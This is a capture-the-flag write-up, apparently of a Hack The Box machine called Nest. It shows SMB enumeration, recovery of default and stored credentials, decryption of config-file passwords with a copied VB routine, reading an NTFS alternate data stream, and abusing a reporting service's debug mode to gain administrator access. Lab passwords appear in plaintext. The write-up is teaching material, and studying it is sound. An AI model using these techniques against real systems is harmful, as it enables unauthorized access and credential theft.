Nest is a Windows machine considered easy/medium. An anonymous SMB access allows to retrieve a first non-privileged account. The recovery of an encrypted password and sources of a Visual Basic project allows lead the user’s password decryption. Privilege escalation is done through a “reporting” service allowing to get a new encrypted string on the disk. The decryption of this last one allows an administrator access.
Disclaimer : It is a rather quick presentation that deliberately omits the various research areas. Only the actual results and a quick approach are presented. Furthermore, I didn’t have lot of time to write and translate this write-up, so I used deepl.com translator for some parts ! I’m sorry if the english is not that good ! :)
Discovery / Enumeration
A quick port scan gives us running services on the machine
$ sudo nmap -sS -p 0-10000 -T4 -sV -sC default -O -v -oN scan_nmap 10.10.10.178 Nmap scan report for 10.10.10.178 Host is up (0.030s latency). Not shown: 9999 filtered ports PORT STATE SERVICE VERSION 445/tcp open microsoft-ds? 4386/tcp open unknown | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, X11Probe: | Reporting Service V1.2 | FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions: | Reporting Service V1.2 | Unrecognised command | Help: | Reporting Service V1.2 | This service allows users to run queries against databases using the legacy HQK format | AVAILABLE COMMANDS --- | LIST | SETDIR <Directory_Name> | RUNQUERY <Query_ID> | DEBUG <Password> |_ HELP <Command> 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port4386-TCP:V=7.70%I=7%D=2/23%Time=5E52D49C%P=x86_64-pc-linux-gnu%r(NU SF:LL,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLin SF:es,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognise SF:d\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x2 SF:0V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r\ SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comma SF:nd\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\ SF:n\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Repo SF:rting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQK SF:\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP,21," SF:\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\nHQK\ SF:x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20allows\ SF:x20users\x20to\x20run\x20queries\x20against\x20databases\x20using\x20th SF:e\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x20--- SF:\r\n\r\nLIST\r\nSETDIR\x20<Directory_Name>\r\nRUNQUERY\x20<Query_ID>\r\ SF:nDEBUG\x20<Password>\r\nHELP\x20<Command>\r\n>")%r(SSLSessionReq,21,"\r SF:\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSessionReq,21,"\ SF:r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerberos,21,"\r\nH SF:QK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNeg,21,"\r\nHQK SF:\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21,"\r\nHQK\x20 SF:Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourRequest,3A,"\r\nHQ SF:K\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20command\ SF:r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n SF:>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\ SF:n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n SF:>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\ SF:r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK\x20Reporting SF:\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nHQK\x20Reporti SF:ng\x20Service\x20V1\.2\r\n\r\n>")%r(NCP,21,"\r\nHQK\x20Reporting\x20Ser SF:vice\x20V1\.2\r\n\r\n>"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|phone|specialized Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista (91%) OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (90%) No exact OS matches for host (test conditions non-ideal). Uptime guess: 1.473 days (since Sat Feb 22 09:20:24 2020) TCP Sequence Prediction: Difficulty=262 (Good luck!) IP ID Sequence Generation: Incremental Host script results: |_clock-skew: mean: 1m52s, deviation: 0s, median: 1m52s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-02-23 20:42:32 |_ start_date: 2020-02-22 09:23:12 NSE: Script Post-scanning. Initiating NSE at 20:41 Completed NSE at 20:41, 0.00s elapsed Initiating NSE at 20:41 Completed NSE at 20:41, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1012.52 seconds Raw packets sent: 30720 (1.357MB) | Rcvd: 663 (31.066KB)
The scan is revealing that 2 ports are open. The classical 445 but also the 4386 which seems to be a “Reporting” service.
Anonymous SMB access and temporary account
For the first research, we can start with a service we already know, SMB shares. Thanks to an anonymous connection, we are able to list the readable shares.
$ smbclient -U "" -L \\\\10.10.10.178 Unable to initialize messaging context Enter WORKGROUP\'s password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share Data Disk IPC$ IPC Remote IPC Secure$ Disk Users Disk SMB1 disabled -- no workgroup available
3 shares can be interesting for the moment: - Data - Secure$ - USers$
We start by looking at the
Users$ share, which among other things allows us to retrieve the list of users on the machine. Useful!
$ smbclient -U "" \\\\10.10.10.178\\Users Unable to initialize messaging context Enter WORKGROUP\'s password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Sun Jan 26 00:04:21 2020 .. D 0 Sun Jan 26 00:04:21 2020 Administrator D 0 Fri Aug 9 17:08:23 2019 C.Smith D 0 Sun Jan 26 08:21:44 2020 L.Frost D 0 Thu Aug 8 19:03:01 2019 R.Thompson D 0 Thu Aug 8 19:02:50 2019 TempUser D 0 Thu Aug 8 00:55:56 2019 10485247 blocks of size 4096. 6545336 blocks available
Being curious, we can try the
Secure$ share. But the name is true, this one is more secured, and we can’t log without a user account.
$ smbclient -U "" \\\\10.10.10.178\\Secure$ Enter WORKGROUP\'s password: Try "help" to get a list of possible commands. smb: \> ls NT_STATUS_ACCESS_DENIED listing \*
Last unexplored way, the
Data share. We can see different things.
$ smbclient -U "" \\\\10.10.10.178\\Data Unable to initialize messaging context Enter WORKGROUP\'s password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Thu Aug 8 00:53:46 2019 .. D 0 Thu Aug 8 00:53:46 2019 IT D 0 Thu Aug 8 00:58:07 2019 Production D 0 Mon Aug 5 23:53:38 2019 Reports D 0 Mon Aug 5 23:53:44 2019 Shared D 0 Wed Aug 7 21:07:51 2019 10485247 blocks of size 4096. 6545336 blocks available
After some research, we quickly come across a “Welcome Email” text file. This type of file can be very interesting because it can contain information such as default accounts.
smb: \Shared\Templates\HR\> ls . D 0 Wed Aug 7 21:08:01 2019 .. D 0 Wed Aug 7 21:08:01 2019 Welcome Email.txt A 425 Thu Aug 8 00:55:36 2019 10485247 blocks of size 4096. 6545577 blocks available smb: \Shared\Templates\HR\> get "Welcome Email.txt" getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (3.4 KiloBytes/sec) (average 1.9 KiloBytes/sec)
By getting this file, we manage to get the first real foothold, a user account !
$ cat Welcome\ Email.txt We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME> You will find your home folder in the following location: \\HTB-NEST\Users\<USERNAME> If you have any issues accessing specific services or workstations, please inform the IT department and use the credentials below until all systems have been set up for you. Username: TempUser Password: welcome2019 Thank you HR% ```` We then try to log in to the `Secure$` share using our new account and boom, it is now in range for us. ```bash $ smbclient -U "TempUser" \\\\10.10.10.178\\Secure$ Unable to initialize messaging context Enter WORKGROUP\TempUser\'s password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Thu Aug 8 01:08:12 2019 .. D 0 Thu Aug 8 01:08:12 2019 Finance D 0 Wed Aug 7 21:40:13 2019 HR D 0 Thu Aug 8 01:08:11 2019 IT D 0 Thu Aug 8 12:59:25 2019
Enumeration and gathering VB project
Here begins a new enumeration phase. Indeed, all the elements that were not previously accessible have to be analyzed, looking for new information.
This includes a portion of the previously inaccessible
$ smbclient -U "TempUser" \\\\10.10.10.178\\Data Enter WORKGROUP\TempUser\'s password: Try "help" to get a list of possible commands. smb: \> cd IT smb: \IT\> ls . D 0 Thu Aug 8 00:58:07 2019 .. D 0 Thu Aug 8 00:58:07 2019 Archive D 0 Tue Aug 6 00:33:58 2019 Configs D 0 Thu Aug 8 00:59:34 2019 Installs D 0 Thu Aug 8 00:08:30 2019 Reports D 0 Sun Jan 26 01:09:13 2020 Tools D 0 Tue Aug 6 00:33:43 2019 10485247 blocks of size 4096. 6545577 blocks available smb: \IT\> cd
Using the method we previsouly used for the welcome email, we quickly find an interesting file, located in one of the configuration folders, which seems to be used for a project called “RU Scanner”.
smb: \IT\Configs\Ru Scanner\> ls . D 0 Wed Aug 7 22:01:13 2019 .. D 0 Wed Aug 7 22:01:13 2019 RU_config.xml A 270 Thu Aug 8 21:49:37 2019 10485247 blocks of size 4096. 6545577 blocks available
$ cat RU_config.xml <?xml version="1.0"?> <ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <Port>389</Port> <Username>c.smith</Username> <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password> </ConfigFile>%
A user! The password here seems encrypted. Nevertheless, no doubt, we’re on the right track. New mission: find the project “RU Scanner”. Indeed, if it uses configuration files like this one, then it must be able to decipher the password.
I didn’t mention it at the beginning of the post, but this machine relies mainly on enumeration and information gathering. As always, not being able to move forward, we continue to investigate the resources that are available. A good idea may be to go and search the other resources in the “Configs” directory. Indeed, there is for example a configuration for the Notepad++ software.
smb: \IT\Configs\NotepadPlusPlus\> ls . D 0 Wed Aug 7 21:31:37 2019 .. D 0 Wed Aug 7 21:31:37 2019 config.xml A 6451 Thu Aug 8 01:01:25 2019 shortcuts.xml A 2108 Wed Aug 7 21:30:27 2019 10485247 blocks of size 4096. 6545509 blocks available
This file reveals an absolute path toward the
Carl user personnal files.
<History nbMaxFile="15" inSubMenu="no" customLength="-1"> <File filename="C:\windows\System32\drivers\etc\hosts" /> <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" /> <File filename="C:\Users\C.Smith\Desktop\todo.txt" /> </History>
Even though we don’t have permission to list the contents of the
IT directory, it turns out that it is possible to continue in the tree, if we have a valid path. This is exactly what we just found. This way, we can sneak into the user’s directory. :)
smb: \IT\Carl\> ls . D 0 Wed Aug 7 21:42:14 2019 .. D 0 Wed Aug 7 21:42:14 2019 Docs D 0 Wed Aug 7 21:44:00 2019 Reports D 0 Tue Aug 6 15:45:40 2019 VB Projects D 0 Tue Aug 6 16:41:55 2019 10485247 blocks of size 4096. 6545509 blocks available
VB Projects directory clearly shows the way. A few directories further on, we come across the famous
smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> ls . D 0 Thu Aug 8 00:05:54 2019 .. D 0 Thu Aug 8 00:05:54 2019 bin D 0 Wed Aug 7 22:00:11 2019 ConfigFile.vb A 772 Thu Aug 8 00:05:09 2019 Module1.vb A 279 Thu Aug 8 00:05:44 2019 My Project D 0 Wed Aug 7 22:00:11 2019 obj D 0 Wed Aug 7 22:00:11 2019 RU Scanner.vbproj A 4828 Fri Aug 9 17:37:51 2019 RU Scanner.vbproj.user A 143 Tue Aug 6 14:55:27 2019 SsoIntegration.vb A 133 Thu Aug 8 00:05:58 2019 Utils.vb A 4888 Wed Aug 7 21:49:35 2019 10485247 blocks of size 4096. 6545509 blocks available
Small trick you can use in order to download an entire folder using smbclient.
smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> mask "" smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> recurse ON smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> prompt OFF smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> mget * getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\ConfigFile.vb of size 772 as ConfigFile.vb (1.8 KiloBytes/sec) (average 1.8 KiloBytes/sec) ...
Decryption and user shell
Having now the source code of the VB project, the goal is to identify the parts of the code allowing to perform the encryption/decryption of passwords. I won’t go into the details of the code, but a
Decrypt function can be identified quite easily.
It takes several variables as parameters, including the encrypted password. If you don’t have the necessary environment to work with VB, you should know that there are several online services offering a simplified virtual environment.
This is notably the case of dotnetfiddle.com that I used for this machine. So we extract the decryption function, which we will call in a simple module, then we display the result.
Imports System Imports System.Security.Cryptography Imports System.Text Public Module Module1 Public Sub Main() Console.WriteLine("Hello World") Dim password As String password = Decrypt("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=", "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) Console.WriteLine(password) End Sub Public Function Decrypt(ByVal cipherText As String, _ ByVal passPhrase As String, _ ByVal saltValue As String, _ ByVal passwordIterations As Integer, _ ByVal initVector As String, _ ByVal keySize As Integer) _ As String Dim initVectorBytes As Byte() initVectorBytes = Encoding.ASCII.GetBytes(initVector) Dim saltValueBytes As Byte() saltValueBytes = Encoding.ASCII.GetBytes(saltValue) Dim cipherTextBytes As Byte() cipherTextBytes = Convert.FromBase64String(cipherText) Dim password As New Rfc2898DeriveBytes(passPhrase, _ saltValueBytes, _ passwordIterations) Dim keyBytes As Byte() keyBytes = password.GetBytes(CInt(keySize / 8)) Dim symmetricKey As New AesCryptoServiceProvider symmetricKey.Mode = CipherMode.CBC Dim decryptor As ICryptoTransform decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes) Dim memoryStream As IO.MemoryStream memoryStream = New IO.MemoryStream(cipherTextBytes) Dim cryptoStream As CryptoStream cryptoStream = New CryptoStream(memoryStream, _ decryptor, _ CryptoStreamMode.Read) Dim plainTextBytes As Byte() ReDim plainTextBytes(cipherTextBytes.Length) Dim decryptedByteCount As Integer decryptedByteCount = cryptoStream.Read(plainTextBytes, _ 0, _ plainTextBytes.Length) memoryStream.Close() cryptoStream.Close() Dim plainText As String plainText = Encoding.ASCII.GetString(plainTextBytes, _ 0, _ decryptedByteCount) Return plainText End Function End Module
We quickly get the desired result, password !
Hello World xRxRxPANCAK3SxRxRx
In particular, this allows us to get access to a new zone, as well as the user flag!
$ smbclient -U "c.smith" \\\\10.10.10.178\\Users Enter WORKGROUP\c.smith\'s password: Try "help" to get a list of possible commands. smb: \> cd C.Smith\ smb: \C.Smith\> ls . D 0 Sun Jan 26 08:21:44 2020 .. D 0 Sun Jan 26 08:21:44 2020 HQK Reporting D 0 Fri Aug 9 01:06:17 2019 user.txt A 32 Fri Aug 9 01:05:24 2019 10485247 blocks of size 4096. 6545509 blocks available
Getting the DEBUG password
New access = new enumeration phase.
HQK Reporting draws our attention. Remember, similar information was reported during the nmap scan. So it makes sense that this is the reporting service.
smb: \C.smith\HQK Reporting\> ls . D 0 Fri Aug 9 01:06:17 2019 .. D 0 Fri Aug 9 01:06:17 2019 AD Integration Module D 0 Fri Aug 9 14:18:42 2019 Debug Mode Password.txt A 0 Fri Aug 9 01:08:17 2019 HQK_Config_Backup.xml A 249 Fri Aug 9 01:09:05 2019 10485247 blocks of size 4096. 6544215 blocks available
During my first researches on the machine, I tried to connect to the service saw a debugging function, requiring a password. That’s fortunate, the above extract mentions a
Debug Mode Password.txt file. Only problem, the file seems empty (size 0)…
This is where a file system trick comes in, streams! In simple words, a stream is a sequence of bytes containing information about a file. It can be keywords, owner information, etc. It is possible to create different streams.
smbclient you can see this information with the following command.
smb: \C.smith\HQK Reporting\> allinfo "Debug Mode Password.txt" altname: DEBUGM~1.TXT create_time: Fri Aug 9 01:06:12 AM 2019 CEST access_time: Fri Aug 9 01:06:12 AM 2019 CEST write_time: Fri Aug 9 01:08:17 AM 2019 CEST change_time: Fri Aug 9 01:08:17 AM 2019 CEST attributes: A (20) stream: [::$DATA], 0 bytes stream: [:Password:$DATA], 15 bytes
Thus we observe an interesting element… The default stream ($DATA) is indeed empty, but a second stream, named “Password” has been created !
smbclient also offers the possibility to download a file by specifying the desired steams.
smb: \C.smith\HQK Reporting\> get "Debug Mode Password.txt:Password:$Data" getting file \C.smith\HQK Reporting\Debug Mode Password.txt:Password:$Data of size 15 as Debug Mode Password.txt:Password:$Data (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec) $ cat Debug\ Mode\ Password.txt:Password:\$Data WBQ201953D8w
Playing with the reporting service
The resolution of this machine continues on the second service identified during port scanning. This allows you to connect to the service through telnet.
$ telnet 10.10.10.178 4386 Trying 10.10.10.178... Connected to 10.10.10.178. Escape character is '^]'. HQK Reporting Service V1.2 >help This service allows users to run queries against databases using the legacy HQK format --- AVAILABLE COMMANDS --- LIST SETDIR <Directory_Name> RUNQUERY <Query_ID> DEBUG <Password> HELP <Command>
Now that we have the DEBUG password, we can start this mode and get access to more commands.
>DEBUG WBQ201953D8w Debug mode enabled. Use the HELP command to view additional commands that are now available >HELP This service allows users to run queries against databases using the legacy HQK format --- AVAILABLE COMMANDS --- LIST SETDIR <Directory_Name> RUNQUERY <Query_ID> DEBUG <Password> HELP <Command> SERVICE SESSION SHOWQUERY <Query_ID>
SERVICE command tells us the binary used here, while the
SESSION command tells us the current directory.
>SERVICE --- HQK REPORTING SERVER INFO --- Version: 220.127.116.11 Server Hostname: HTB-NEST Server Process: "C:\Program Files\HQK\HqkSvc.exe" Server Running As: Service_HQK Initial Query Directory: C:\Program Files\HQK\ALL QUERIES >SESSION --- Session Information --- Session ID: 32315e55-e64a-4b71-bf3f-124285e93ede Debug: True Started At: 3/29/2020 11:55:33 AM Server Endpoint: 10.10.10.178:4386 Client Endpoint: 10.10.14.4:34380 Current Query Directory: C:\Program Files\HQK\ALL QUERIES
SHOWQUERY commands are used. In fact, we can use them as a system to browse the machine filesystem. Indeed, it is possible to associate these commands with the classic
>SETDIR ../ Current directory set to HQK >LIST Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command QUERY FILES IN CURRENT DIRECTORY [DIR] ALL QUERIES [DIR] LDAP [DIR] Logs  HqkSvc.exe  HqkSvc.InstallState  HQK_Config.xml Current Directory: HQK
Logs directories catch our attention. The
LDAP directory is where we find what we are looking for.
>SETDIR LDAP Current directory set to LDAP >LIST Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command QUERY FILES IN CURRENT DIRECTORY  HqkLdap.exe  Ldap.conf Current Directory: LDAP
Ldap.conf file reveals the desired information such as the encrypted password for the administrator!
>SHOWQUERY 2 Domain=nest.local Port=389 BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local User=Administrator Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
Decryption vol.2 and privilege escalation
Okay, we now have an encrypted password for the privileged account! This part seems to be directly used by the process to perform the administrator authentication. So that means we’re going to have to interact directly with this process.
We start by retrieving it locally.
Once this is done, we can decompile the binary. I used
dnSpy for this. I also skip the analysis here, but we quickly find the decryption function. This one is identical to the one previously identified for the user part.
At this point, there are two options to decrypt the password : - Modify the binary code, to display the decrypted password, then recompile and execute it; - Use our online environment again by changing the function settings.
Not being very good with
dnSpy and being a bit fed up of this machine, I took the easy way out by reusing the same thing as for the user :).
[...] Public Sub Main() Console.WriteLine("Hello World") Dim password As String password = Decrypt(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256, 256) Console.WriteLine(password) End Sub [...]
Tadaaaam! We can connect and get the root flag.
For your information, I first went to the
Users share and this is what I found.
$ smbclient -U "Administrator" \\\\10.10.10.178\\Users Unable to initialize messaging context Enter WORKGROUP\Administrator\'s password: Try "help" to get a list of possible commands. smb: \> cd Administrator\ smb: \Administrator\> ls . D 0 Fri Aug 9 17:08:23 2019 .. D 0 Fri Aug 9 17:08:23 2019 flag.txt - Shortcut.lnk A 2384 Fri Aug 9 17:10:15 2019 10485247 blocks of size 4096. 6544908 blocks available
No root flag… But a “flag.txt” file (impossible to retrieve for me).
After a few seconds, I thought about the fact that the
Users share was a copy/reproduction of the
C:/Users directory of the machine, and that having administrator rights, we could simply connect to it.
$ smbclient -U "Administrator" \\\\10.10.10.178\\C$ Enter WORKGROUP\Administrator\'s password: Try "help" to get a list of possible commands. smb: \Users\Administrator\Desktop\> ls . DR 0 Sun Jan 26 08:20:50 2020 .. DR 0 Sun Jan 26 08:20:50 2020 desktop.ini AHS 282 Sat Jan 25 23:02:44 2020 root.txt A 32 Tue Aug 6 00:27:26 2019 10485247 blocks of size 4096. 6543963 blocks available